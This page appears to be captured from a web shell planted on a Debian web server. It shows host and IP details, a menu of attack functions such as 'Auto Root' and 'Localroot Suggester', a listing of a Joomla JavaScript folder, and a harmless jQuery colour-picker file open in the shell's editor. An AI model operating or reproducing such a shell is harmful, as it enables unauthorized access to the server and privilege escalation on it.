Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.217.16
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
media /
jui /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
ajax-chosen.js
4.37
KB
-rwxr-xr-x
2023-07-08 16:23
ajax-chosen.min.js
2.75
KB
-rwxr-xr-x
2023-07-08 16:23
bootstrap-tooltip-extended.js
5.76
KB
-rwxr-xr-x
2023-07-08 16:23
bootstrap-tooltip-extended.min.js
2.42
KB
-rwxr-xr-x
2023-07-08 16:23
bootstrap.js
62.68
KB
-rwxr-xr-x
2023-07-08 16:23
bootstrap.min.js
28.44
KB
-rwxr-xr-x
2023-07-08 16:23
chosen.jquery.js
46.81
KB
-rwxr-xr-x
2023-07-08 16:23
chosen.jquery.min.js
33.44
KB
-rwxr-xr-x
2023-07-08 16:23
cms-uncompressed.js
8.16
KB
-rwxr-xr-x
2023-07-08 16:23
cms.js
3.58
KB
-rwxr-xr-x
2023-07-08 16:23
fielduser.js
4.16
KB
-rwxr-xr-x
2023-07-08 16:23
fielduser.min.js
2.35
KB
-rwxr-xr-x
2023-07-08 16:23
html5-uncompressed.js
10.09
KB
-rwxr-xr-x
2023-07-08 16:23
html5.js
2.67
KB
-rwxr-xr-x
2023-07-08 16:23
icomoon-lte-ie7.js
9.64
KB
-rwxr-xr-x
2023-07-08 16:23
jquery-migrate.js
22.95
KB
-rwxr-xr-x
2023-07-08 16:23
jquery-migrate.min.js
9.82
KB
-rwxr-xr-x
2023-07-08 16:23
jquery-noconflict.js
21
B
-rwxr-xr-x
2023-07-08 16:23
jquery.autocomplete.js
33.79
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.autocomplete.min.js
12.8
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.js
292.38
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.min.js
95.36
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.minicolors.js
40.27
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.minicolors.min.js
15.08
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.searchtools.js
10.54
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.searchtools.min.js
7.4
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.simplecolors.js
5.83
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.simplecolors.min.js
3.02
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.ui.core.js
44.05
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.ui.core.min.js
20.01
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.ui.sortable.js
39.51
KB
-rwxr-xr-x
2023-07-08 16:23
jquery.ui.sortable.min.js
23.85
KB
-rwxr-xr-x
2023-07-08 16:23
sortablelist.js
9.38
KB
-rwxr-xr-x
2023-07-08 16:23
treeselectmenu.jquery.js
3.41
KB
-rwxr-xr-x
2023-07-08 16:23
treeselectmenu.jquery.min.js
2.56
KB
-rwxr-xr-x
2023-07-08 16:23
Save
Rename
/** * LOOSELY BASED ON: * Very simple jQuery Color Picker * Copyright (C) 2012 Tanguy Krotoff * Licensed under the MIT license * * ADAPTED BY: * Copyright (C) 2013 Peter van Westen * * MIT License * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ (function($) { var SimpleColorPicker = function(element, options) { this.select = $(element); this.options = $.extend({}, $.fn.simplecolors.defaults, options); this.select.hide(); // Build the list of colors var list = ''; $('option', this.select).each(function() { var option = $(this); var color = option.val(); if (option.text() == '-') { list += '<br />'; } else { var clss = 'simplecolors-swatch'; if (color == 'none') { clss += ' nocolor'; color = 'transparent'; } if (option.attr('selected')) { clss += ' active'; } list += '<span class="' + clss + '"><span style="background-color: ' + color + ';" tabindex="0"></span></span>'; } }); var color = this.select.val(); var clss = 'simplecolors-swatch'; if (color == 'none') { clss += ' nocolor'; color = 'transparent'; } this.icon = $('<span class="' + clss + '"><span style="background-color: ' + color + ';" tabindex="0"></span></span>').insertAfter(this.select); this.icon.on('click', $.proxy(this.show, this)); this.panel = $('<span class="simplecolors-panel"></span>').appendTo(document.body); this.panel.html(list); this.panel.on('click', $.proxy(this.click, this)); // Hide panel when clicking outside $(document).on('mousedown', $.proxy(this.hide, this)); this.panel.on('mousedown', $.proxy(this.mousedown, this)); }; /** * SimpleColorPicker class */ SimpleColorPicker.prototype = { constructor: SimpleColorPicker, show: function() { var panelpadding = 7; // Empirical value var pos = this.icon.offset(); switch (this.select.attr('data-position')) { case 'top': this.panel.css({ left: pos.left - panelpadding, top: pos.top - this.panel.outerHeight() - 1 }); break; case 'bottom': this.panel.css({ left: pos.left - panelpadding, top: pos.top + this.icon.outerHeight() }); break; case 'left': this.panel.css({ left: pos.left - this.panel.outerWidth(), top: pos.top - ( (this.panel.outerHeight() - this.icon.outerHeight() ) / 2 ) - 1 }); break; case 'right': default: this.panel.css({ left: pos.left + this.icon.outerWidth(), top: pos.top - ( (this.panel.outerHeight() - this.icon.outerHeight() ) / 2 ) - 1 }); break; } this.panel.show(this.options.delay); }, hide: function() { if (this.panel.css('display') != 'none') { this.panel.hide(this.options.delay); } }, click: function(e) { var target = $(e.target); if (target.length === 1) { if (target[0].nodeName.toLowerCase() === 'span') { // When you click on a color var color = ''; var bgcolor = ''; var clss = ''; if (target.parent().hasClass('nocolor')) { color = 'none'; bgcolor = 'transparent'; clss = 'nocolor'; } else { color = this.rgb2hex(target.css('background-color')); bgcolor = color; } // Mark this div as the selected one target.parent().siblings().removeClass('active'); target.parent().addClass('active'); this.icon.removeClass('nocolor').addClass(clss); this.icon.find('span').css('background-color', bgcolor); // Hide the panel this.hide(); // Change select value this.select.val(color).change(); } } }, /** * Prevents the mousedown event from "eating" the click event. */ mousedown: function(e) { e.stopPropagation(); e.preventDefault(); }, /** * Converts a RGB color to its hexadecimal value. * * See http://stackoverflow.com/questions/1740700/get-hex-value-rather-than-rgb-value-using-$ */ rgb2hex: function(rgb) { function hex(x) { return ("0" + parseInt(x, 10).toString(16)).slice(-2); } var matches = rgb.match(/^rgb\((\d+),\s*(\d+),\s*(\d+)\)$/); if (matches === null) { // Fix for Internet Explorer < 9 // Variable rgb is already a hexadecimal value return rgb; } else { return '#' + hex(matches[1]) + hex(matches[2]) + hex(matches[3]); } } }; /** * Plugin definition. */ $.fn.simplecolors = function(option) { // For HTML element passed to the plugin return this.each(function() { var $this = $(this), data = $this.data('simplecolors'), options = typeof option === 'object' && option; if (!data) { $this.data('simplecolors', (data = new SimpleColorPicker(this, options))); } if (typeof option === 'string') { data[option](); } }); }; $.fn.simplecolors.Constructor = SimpleColorPicker; /** * Default options. */ $.fn.simplecolors.defaults = { // Animation delay delay: 0 }; })(jQuery);